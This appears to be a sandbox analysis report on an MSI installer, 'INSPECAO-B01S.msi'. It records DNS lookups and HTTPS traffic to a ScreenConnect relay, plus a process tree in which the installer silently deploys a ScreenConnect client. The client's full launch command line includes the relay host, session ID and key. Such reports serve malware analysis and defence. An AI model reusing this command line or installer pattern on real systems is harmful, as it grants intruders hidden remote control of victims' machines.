Oct 27, 2024 12:01:57.253959894 CET	49747	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:57.253981113 CET	443	49747	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:57.254112005 CET	443	49747	147.75.63.168	192.168.2.4
Oct 27, 2024 12:02:19.281429052 CET	49820	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:02:19.281542063 CET	443	49820	147.75.63.168	192.168.2.4
Oct 27, 2024 12:02:19.281632900 CET	49820	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:02:19.283951998 CET	49820	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:02:19.283993006 CET	443	49820	147.75.63.168	192.168.2.4
Oct 27, 2024 12:02:19.284070015 CET	443	49820	147.75.63.168	192.168.2.4
Oct 27, 2024 12:02:58.010237932 CET	50015	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:02:58.010324001 CET	443	50015	147.75.63.168	192.168.2.4
Oct 27, 2024 12:02:58.010631084 CET	50015	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:02:58.012572050 CET	50015	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:02:58.012656927 CET	443	50015	147.75.63.168	192.168.2.4
Oct 27, 2024 12:02:58.012701035 CET	443	50015	147.75.63.168	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 12:01:12.271295071 CET	58883	53	192.168.2.4	1.1.1.1
Oct 27, 2024 12:01:12.632977962 CET	53	58883	1.1.1.1	192.168.2.4
Oct 27, 2024 12:01:57.212277889 CET	63303	53	192.168.2.4	1.1.1.1
Oct 27, 2024 12:01:57.236401081 CET	53	63303	1.1.1.1	192.168.2.4
Oct 27, 2024 12:02:57.973961115 CET	50143	53	192.168.2.4	1.1.1.1
Oct 27, 2024 12:02:58.000051022 CET	53	50143	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 27, 2024 12:01:12.271295071 CET	192.168.2.4	1.1.1.1	0xd98b	Standard query (0)	instance-xkznvd-relay.screenconnect.com	A (IP address)	IN (0x0001)	false
Oct 27, 2024 12:01:57.212277889 CET	192.168.2.4	1.1.1.1	0x217c	Standard query (0)	instance-xkznvd-relay.screenconnect.com	A (IP address)	IN (0x0001)	false
Oct 27, 2024 12:02:57.973961115 CET	192.168.2.4	1.1.1.1	0xd70d	Standard query (0)	instance-xkznvd-relay.screenconnect.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 27, 2024 12:01:12.632977962 CET	1.1.1.1	192.168.2.4	0xd98b	No error (0)	instance-xkznvd-relay.screenconnect.com	server-nix9656e2a4-relay.screenconnect.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 27, 2024 12:01:12.632977962 CET	1.1.1.1	192.168.2.4	0xd98b	No error (0)	server-nix9656e2a4-relay.screenconnect.com		147.75.63.168	A (IP address)	IN (0x0001)	false
Oct 27, 2024 12:01:57.236401081 CET	1.1.1.1	192.168.2.4	0x217c	No error (0)	instance-xkznvd-relay.screenconnect.com	server-nix9656e2a4-relay.screenconnect.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 27, 2024 12:01:57.236401081 CET	1.1.1.1	192.168.2.4	0x217c	No error (0)	server-nix9656e2a4-relay.screenconnect.com		147.75.63.168	A (IP address)	IN (0x0001)	false
Oct 27, 2024 12:02:58.000051022 CET	1.1.1.1	192.168.2.4	0xd70d	No error (0)	instance-xkznvd-relay.screenconnect.com	server-nix9656e2a4-relay.screenconnect.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 27, 2024 12:02:58.000051022 CET	1.1.1.1	192.168.2.4	0xd70d	No error (0)	server-nix9656e2a4-relay.screenconnect.com		147.75.63.168	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	07:01:06
Start date:	27/10/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\INSPECAO-B01S.msi"
Imagebase:	0x7ff6c5300000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	1
Start time:	07:01:07
Start date:	27/10/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff6c5300000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	2
Start time:	07:01:07
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 3B0D9CA4E13447273575F5AF2A2A458A C
Imagebase:	0xf70000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	07:01:07
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBC6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4983906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Imagebase:	0xad0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	07:01:09
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 9498291156A768CDF30C7CBD1AD63E0B
Imagebase:	0xf70000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	07:01:10
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding A9BFA3C15C3C22AD10EB69C2707C2272 E Global\MSI0000
Imagebase:	0xf70000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	07:01:10
Start date:	27/10/2024
Path:	C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-xkznvd-relay.screenconnect.com&p=443&s=e3b17808-f02f-4082-a0ad-0ef89097505d&k=BgIAAACkAABSU0ExAAgAAAEAAQBhw2Nfb6ZuPKlEDIhhDVtAYuyd858SiHfXVlo7oudUHFIakFl%2fPS5vluFfI688c%2ffI5cXvCjgFShXpqsjscRe%2bvZHKSRm%2bteuE97Q6NBZ5oegi61HDzK9%2bJY6drnQvjn5O3W4R13ZtTHxRqVi92KIEihsQur1J2%2fL4Cjo7mR%2bTf3z2FvvhBA9AI44ir3hX7T6YCeKwSXIGWSjwulU6qmSUa0YOa6ak5ubRKh%2fug0gS3wbeTgSuaLTj1hdcHea2xRvqMqyIWF1MOawExDdmH4KtYMuNWGxsLao6ChTQtObulDnOQ2rzUTbk681GAIKtEvzer9DayT7dfK5gHsogR7Cx&c=envioparaiba20%2f10&c=&c=&c=&c=&c=&c=&c="
Imagebase:	0xea0000
File size:	95'520 bytes
MD5 hash:	826314610D9E854477B08666330940B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	false

Target ID:	7
Start time:	07:01:11
Start date:	27/10/2024
Path:	C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe" "RunRole" "fedb95f0-928e-4923-97ab-510c95cfca5c" "User"
Imagebase:	0x40000
File size:	598'816 bytes
MD5 hash:	AB5FA8D90645878D587F386D0E276C02
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	false

Target ID:	8
Start time:	07:01:13
Start date:	27/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	12
Start time:	07:01:51
Start date:	27/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false